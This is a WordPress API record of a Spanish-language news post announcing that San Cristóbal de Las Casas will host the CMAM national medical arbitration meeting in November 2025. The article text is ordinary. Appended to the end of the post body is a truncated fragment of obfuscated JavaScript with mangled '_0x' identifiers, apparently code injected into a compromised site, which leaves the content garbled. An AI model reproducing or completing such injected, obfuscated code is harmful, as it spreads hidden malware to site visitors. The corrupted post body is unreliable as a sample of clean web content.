{"id":25024,"date":"2025-11-11T21:28:10","date_gmt":"2025-11-11T21:28:10","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=25024"},"modified":"2025-11-11T21:28:11","modified_gmt":"2025-11-11T21:28:11","slug":"san-cristobal-de-las-casas-sera-sede-de-la-xliv-reunion-nacional-del-cmam-2","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=25024","title":{"rendered":"San Crist\u00f3bal de Las Casas ser\u00e1 sede de la XLIV Reuni\u00f3n Nacional del CMAM"},"content":{"rendered":"\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"682\" data-id=\"25026\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/11\/1000419831-1024x682.jpg\" alt=\"\" class=\"wp-image-25026\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/11\/1000419831-1024x682.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/11\/1000419831-300x200.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/11\/1000419831-768x512.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/11\/1000419831-1536x1023.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/11\/1000419831-310x205.jpg 310w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/11\/1000419831.jpg 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"682\" data-id=\"25025\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/11\/1000419836-1024x682.jpg\" alt=\"\" class=\"wp-image-25025\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/11\/1000419836-1024x682.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/11\/1000419836-300x200.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/11\/1000419836-768x512.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/11\/1000419836-1536x1023.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/11\/1000419836-310x205.jpg 310w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/11\/1000419836.jpg 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/figure>\n\n\n\n<p>San Crist\u00f3bal de Las Casas, 4 de noviembre de 2025.\u2013 La ciudad de San Crist\u00f3bal de Las Casas ser\u00e1 sede de la XLIV Reuni\u00f3n Nacional del Consejo Mexicano de Arbitraje M\u00e9dico (CMAM), que se llevar\u00e1 a cabo los d\u00edas 27 y 28 de noviembre, consolid\u00e1ndose como un punto de encuentro nacional para el intercambio de experiencias y el fortalecimiento del sistema de salud.<\/p>\n\n\n\n<p>Durante una reuni\u00f3n de trabajo, las y los integrantes de la Comisi\u00f3n Estatal de Conciliaci\u00f3n y Arbitraje M\u00e9dico del Estado de Chiapas informaron a la presidenta municipal, Fabiola Ricci Diestel, sobre los preparativos de este importante evento, que contar\u00e1 con la participaci\u00f3n de la Comisionada Nacional, as\u00ed como de doctoras y doctores comisionados de todo el pa\u00eds, junto con autoridades de salud federal y estatal.<\/p>\n\n\n\n<p>La alcaldesa refrend\u00f3 su compromiso de respaldar las actividades que promuevan la imagen de San Crist\u00f3bal de Las Casas a nivel nacional, destacando que ser\u00e1 un honor recibir a las y los participantes en este espacio de di\u00e1logo y colaboraci\u00f3n para el fortalecimiento del sistema de salud en M\u00e9xico.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>San Crist\u00f3bal de Las Casas, 4 de noviembre de 2025.\u2013 La ciudad de San Crist\u00f3bal de Las Casas ser\u00e1 sede de la XLIV Reuni\u00f3n Nacional del Consejo Mexicano de Arbitraje M\u00e9dico (CMAM), que se llevar\u00e1 a cabo los d\u00edas 27 y 28 de noviembre, consolid\u00e1ndose como un punto de encuentro nacional para el intercambio de &hellip;<\/p>\n","protected":false},"author":2,"featured_media":25026,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-25024","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/25024","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=25024"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/25024\/revisions"}],"predecessor-version":[{"id":25027,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/25024\/revisions\/25027"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/25026"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=25024"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=25024"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=25024"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}